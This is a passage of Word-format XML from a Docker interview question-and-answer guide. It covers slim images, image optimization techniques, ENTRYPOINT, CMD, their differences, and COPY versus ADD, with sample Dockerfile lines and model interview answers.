        <w:t>Slim images are optimized versions of standard container images that remove non-essential components such as documentation, development tools, and extra packages while retaining the runtime dependencies required by the application. They offer a balance between image size, security, and operational convenience. Compared to full images, slim images reduce storage requirements, improve deployment speed, and decrease the attack surface, while still providing debugging capabilities and package management functionality. They are widely used in production environments and are often combined with multi-stage Docker builds to create efficient container images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q374. Explain image optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Explain Image Optimization</w:t>
        <w:br/>
        <w:t>Image optimization is the process of creating smaller, secure, and efficient Docker images to improve build speed, deployment speed, storage usage, and security.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why is Image Optimization Important?</w:t>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster image builds</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster image pulls and pushes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced storage costs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced network bandwidth</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lower attack surface</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster container startup</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Use Lightweight Base Images</w:t>
        <w:br/>
        <w:t>Instead of:</w:t>
        <w:br/>
        <w:t>FROM ubuntu:24.04</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t>FROM alpine:3.22</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>FROM node:24-slim</w:t>
        <w:br/>
        <w:t>Smaller base images reduce overall image size.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Use Multi-Stage Builds</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>FROM maven:3.9</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN mvn package</w:t>
        <w:br/>
        <w:t>Build tools remain in the final image.</w:t>
        <w:br/>
        <w:t>Good:</w:t>
        <w:br/>
        <w:t>FROM maven:3.9 AS builder</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN mvn package</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>FROM eclipse-temurin:21-jre-slim</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY --from=builder target/app.jar app.jar</w:t>
        <w:br/>
        <w:t>Only the application artifact is copied to the final image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Reduce Docker Layers</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>RUN apt-get update</w:t>
        <w:br/>
        <w:t>RUN apt-get install -y curl</w:t>
        <w:br/>
        <w:t>RUN apt-get clean</w:t>
        <w:br/>
        <w:t>Good:</w:t>
        <w:br/>
        <w:t>RUN apt-get update &amp;&amp; \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apt-get install -y curl &amp;&amp; \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apt-get clean</w:t>
        <w:br/>
        <w:t>Combining commands reduces image layers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Use</w:t>
        <w:br/>
        <w:t>.dockerignore</w:t>
        <w:br/>
        <w:t>Prevent unnecessary files from being copied into the image.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>.git</w:t>
        <w:br/>
        <w:t>node_modules</w:t>
        <w:br/>
        <w:t>*.log</w:t>
        <w:br/>
        <w:t>tmp/</w:t>
        <w:br/>
        <w:t>This reduces build context size and improves build performance.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Remove Unnecessary Packages</w:t>
        <w:br/>
        <w:t>Install only what the application needs.</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>RUN apt-get install -y vim wget curl net-tools</w:t>
        <w:br/>
        <w:t>Good:</w:t>
        <w:br/>
        <w:t>RUN apt-get install -y curl</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Clean Package Cache</w:t>
        <w:br/>
        <w:t>RUN apt-get update &amp;&amp; \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apt-get install -y nginx &amp;&amp; \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    rm -rf /var/lib/apt/lists/*</w:t>
        <w:br/>
        <w:t>Removes temporary package files and reduces image size.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Use Distroless Images for Production</w:t>
        <w:br/>
        <w:t>FROM gcr.io/distroless/java21</w:t>
        <w:br/>
        <w:t>Advantages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No shell</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No package manager</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Smaller attack surface</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Better security</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8. Avoid Storing Secrets</w:t>
        <w:br/>
        <w:t>Never bake secrets into images.</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>ENV DB_PASSWORD=password123</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes Secrets</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Secret managers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runtime environment variables</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>9. Use Specific Image Tags</w:t>
        <w:br/>
        <w:t>Avoid:</w:t>
        <w:br/>
        <w:t>FROM node:latest</w:t>
        <w:br/>
        <w:t>Prefer:</w:t>
        <w:br/>
        <w:t>FROM node:24.3.0-slim</w:t>
        <w:br/>
        <w:t>Provides reproducible builds and easier rollbacks.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>10. Scan Images Regularly</w:t>
        <w:br/>
        <w:t>Use tools such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Trivy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Grype</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>trivy image myapp:v1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Optimization Example</w:t>
        <w:br/>
        <w:t>Initial Image          : 1.5 GB</w:t>
        <w:br/>
        <w:t>↓</w:t>
        <w:br/>
        <w:t>Slim Base Image        : 500 MB</w:t>
        <w:br/>
        <w:t>↓</w:t>
        <w:br/>
        <w:t>Multi-Stage Build      : 180 MB</w:t>
        <w:br/>
        <w:t>↓</w:t>
        <w:br/>
        <w:t>Distroless Runtime     : 90 MB</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Image optimization is the practice of reducing Docker image size and improving security, performance, and maintainability. Common techniques include using lightweight base images, implementing multi-stage builds, minimizing layers, cleaning package caches, using .dockerignore, removing unnecessary dependencies, and adopting distroless images for production. Optimized images result in faster CI/CD pipelines, quicker deployments, lower storage costs, reduced attack surface, and improved overall container efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q375. What is ENTRYPOINT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is ENTRYPOINT?</w:t>
        <w:br/>
        <w:t>ENTRYPOINT is a Dockerfile instruction that defines the main executable that will always run when a container starts.</w:t>
        <w:br/>
        <w:t>It specifies the container’s primary process.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Syntax</w:t>
        <w:br/>
        <w:t>Exec Form (Recommended)</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["nginx", "-g", "daemon off;"]</w:t>
        <w:br/>
        <w:t>Shell Form</w:t>
        <w:br/>
        <w:t>ENTRYPOINT nginx -g "daemon off;"</w:t>
        <w:br/>
        <w:t>The exec form is preferred because it handles signals properly and works better with container lifecycle management.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>FROM ubuntu:24.04</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ENTRYPOINT ["echo"]</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run myimage Hello Docker</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Hello Docker</w:t>
        <w:br/>
        <w:t>Arguments provided at runtime are appended to the ENTRYPOINT command.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ENTRYPOINT vs CMD</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["echo"]</w:t>
        <w:br/>
        <w:t>CMD ["Hello"]</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run myimage</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Hello</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run myimage Docker</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:t>Here:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * ENTRYPOINT = fixed executable (echo)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CMD = default arguments (Hello)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How They Work Together</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["java", "-jar"]</w:t>
        <w:br/>
        <w:t>CMD ["app.jar"]</w:t>
        <w:br/>
        <w:t>When container starts:</w:t>
        <w:br/>
        <w:t>java -jar app.jar</w:t>
        <w:br/>
        <w:t>Override CMD:</w:t>
        <w:br/>
        <w:t>docker run myimage newapp.jar</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>java -jar newapp.jar</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Override ENTRYPOINT</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t>docker run --entrypoint /bin/bash myimage</w:t>
        <w:br/>
        <w:t>This replaces the Dockerfile ENTRYPOINT.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t>Java Application</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["java","-jar","app.jar"]</w:t>
        <w:br/>
        <w:t>Python Application</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["python","app.py"]</w:t>
        <w:br/>
        <w:t>Nginx</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["nginx","-g","daemon off;"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best Practices</w:t>
        <w:br/>
        <w:t>✅ Use exec form (["cmd","arg"])</w:t>
        <w:br/>
        <w:t>✅ Keep ENTRYPOINT for the main application</w:t>
        <w:br/>
        <w:t>✅ Use CMD for default arguments</w:t>
        <w:br/>
        <w:t>✅ Ensure the main process runs in the foreground</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>ENTRYPOINT is a Dockerfile instruction that defines the primary executable that runs when a container starts. Unlike CMD, which provides default arguments, ENTRYPOINT specifies the fixed command that should always be executed. Runtime arguments passed to docker run are appended to the ENTRYPOINT command unless explicitly overridden using the --entrypoint option. In production containers, ENTRYPOINT is commonly used to launch the main application process, such as a Java JAR, Python application, or web server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q376. Explain CMD in Docker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is CMD in Docker?</w:t>
        <w:br/>
        <w:t>CMD is a Dockerfile instruction that specifies the default command or arguments to run when a container starts.</w:t>
        <w:br/>
        <w:t>If the user does not provide a command during docker run, Docker executes the CMD instruction.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Syntax</w:t>
        <w:br/>
        <w:t>Exec Form (Recommended)</w:t>
        <w:br/>
        <w:t>CMD ["nginx", "-g", "daemon off;"]</w:t>
        <w:br/>
        <w:t>Shell Form</w:t>
        <w:br/>
        <w:t>CMD nginx -g "daemon off;"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>FROM ubuntu:24.04</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["echo", "Hello World"]</w:t>
        <w:br/>
        <w:t>Build:</w:t>
        <w:br/>
        <w:t>docker build -t myimage .</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run myimage</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Hello World</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Overriding CMD</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>CMD ["echo", "Hello World"]</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run myimage "Docker"</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:t>The command provided at runtime replaces the CMD.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD with ENTRYPOINT</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["java", "-jar"]</w:t>
        <w:br/>
        <w:t>CMD ["app.jar"]</w:t>
        <w:br/>
        <w:t>Container starts as:</w:t>
        <w:br/>
        <w:t>java -jar app.jar</w:t>
        <w:br/>
        <w:t>Override CMD:</w:t>
        <w:br/>
        <w:t>docker run myimage newapp.jar</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>java -jar newapp.jar</w:t>
        <w:br/>
        <w:t>Here:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * ENTRYPOINT = fixed command</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CMD = default argument</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rules of CMD</w:t>
        <w:br/>
        <w:t>Only the last CMD instruction in a Dockerfile is used.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>CMD ["echo", "First"]</w:t>
        <w:br/>
        <w:t>CMD ["echo", "Second"]</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Second</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD vs ENTRYPOINT</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CMD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ENTRYPOINT</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default command/arguments</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Main executable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Can be overridden</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Not easily</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime Arguments</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Replace CMD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Appended to ENTRYPOINT</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Typical Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default options</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Main application process</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Examples</w:t>
        <w:br/>
        <w:t>Nginx</w:t>
        <w:br/>
        <w:t>CMD ["nginx", "-g", "daemon off;"]</w:t>
        <w:br/>
        <w:t>Python</w:t>
        <w:br/>
        <w:t>CMD ["python", "app.py"]</w:t>
        <w:br/>
        <w:t>Node.js</w:t>
        <w:br/>
        <w:t>CMD ["node", "server.js"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best Practice</w:t>
        <w:br/>
        <w:t>For production applications:</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["java", "-jar"]</w:t>
        <w:br/>
        <w:t>CMD ["app.jar"]</w:t>
        <w:br/>
        <w:t>This keeps:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application executable fixed</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runtime arguments flexible</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>CMD is a Dockerfile instruction that defines the default command or arguments executed when a container starts. If no command is provided during container execution, Docker runs the CMD instruction. CMD can be overridden at runtime and is commonly used to specify default parameters for an application. When used together with ENTRYPOINT, ENTRYPOINT defines the executable while CMD supplies the default arguments. This combination provides flexibility and is a common pattern in production container images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q377. Difference between CMD and ENTRYPOINT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Difference Between CMD and ENTRYPOINT</w:t>
        <w:br/>
        <w:t>Both CMD and ENTRYPOINT define what runs when a Docker container starts, but they serve different purposes.</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CMD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ENTRYPOINT</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Provides default command/arguments</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Defines the main executable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Mandatory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easily Overridden</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No (requires --entrypoint)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime Arguments</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Replace CMD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Appended to ENTRYPOINT</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Typical Use</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default parameters</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Main application</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD Example</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>FROM ubuntu</w:t>
        <w:br/>
        <w:t>CMD ["echo", "Hello"]</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run myimage</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Hello</w:t>
        <w:br/>
        <w:t>Override:</w:t>
        <w:br/>
        <w:t>docker run myimage Docker</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:t>The runtime command completely replaces CMD.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ENTRYPOINT Example</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>FROM ubuntu</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["echo"]</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run myimage Hello</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Hello</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run myimage Docker</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:t>The runtime argument is appended to the ENTRYPOINT command.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD + ENTRYPOINT Together</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["java", "-jar"]</w:t>
        <w:br/>
        <w:t>CMD ["app.jar"]</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run myimage</w:t>
        <w:br/>
        <w:t>Executed command:</w:t>
        <w:br/>
        <w:t>java -jar app.jar</w:t>
        <w:br/>
        <w:t>Override CMD:</w:t>
        <w:br/>
        <w:t>docker run myimage newapp.jar</w:t>
        <w:br/>
        <w:t>Executed command:</w:t>
        <w:br/>
        <w:t>java -jar newapp.jar</w:t>
        <w:br/>
        <w:t>ENTRYPOINT stays fixed; CMD changes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Overriding ENTRYPOINT</w:t>
        <w:br/>
        <w:t>Dockerfile:</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["java", "-jar"]</w:t>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run --entrypoint /bin/bash myimage</w:t>
        <w:br/>
        <w:t>ENTRYPOINT is completely replaced.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Usage</w:t>
        <w:br/>
        <w:t>CMD Only</w:t>
        <w:br/>
        <w:t>CMD ["nginx", "-g", "daemon off;"]</w:t>
        <w:br/>
        <w:t>Suitable when users may want to run different commands.</w:t>
        <w:br/>
        <w:t>ENTRYPOINT + CMD</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["python"]</w:t>
        <w:br/>
        <w:t>CMD ["app.py"]</w:t>
        <w:br/>
        <w:t>Default:</w:t>
        <w:br/>
        <w:t>python app.py</w:t>
        <w:br/>
        <w:t>Override:</w:t>
        <w:br/>
        <w:t>docker run myimage test.py</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>python test.py</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>CMD and ENTRYPOINT are Dockerfile instructions used to define container startup behavior. ENTRYPOINT specifies the main executable that always runs when the container starts, while CMD provides default arguments or a default command. Runtime arguments replace CMD but are appended to ENTRYPOINT. When used together, ENTRYPOINT defines the fixed application executable and CMD supplies configurable default parameters. This combination is commonly used in production images because it provides both consistency and flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q378. Explain COPY vs ADD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: COPY vs ADD in Docker</w:t>
        <w:br/>
        <w:t>Both COPY and ADD are Dockerfile instructions used to copy files into an image, but ADD has additional functionality.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY</w:t>
        <w:br/>
        <w:t>COPY simply copies files and directories from the build context to the container image.</w:t>
        <w:br/>
        <w:t>Syntax</w:t>
        <w:br/>
        <w:t>COPY &lt;source&gt; &lt;destination&gt;</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>COPY app.jar /app/</w:t>
        <w:br/>
        <w:t>COPY config/ /app/config/</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ADD</w:t>
        <w:br/>
        <w:t>ADD can do everything COPY does, plus:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Extract local compressed archives automatically.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Download files from URLs.</w:t>
        <w:br/>
        <w:t>Syntax</w:t>
        <w:br/>
        <w:t>ADD &lt;source&gt; &lt;destination&gt;</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>ADD app.tar.gz /app/</w:t>
        <w:br/>
        <w:t>Docker automatically extracts:</w:t>
        <w:br/>
        <w:t>app.tar.gz</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Extracted into /app</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>URL Example</w:t>
        <w:br/>
        <w:t>ADD https://example.com/file.txt /tmp/</w:t>
        <w:br/>
        <w:t>Docker downloads the file during the build.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Comparison</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>COPY</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ADD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Copy local files</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Copy directories</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Extract local tar files</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Download URLs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Predictable behavior</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recommended for most cases</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Using COPY</w:t>
        <w:br/>
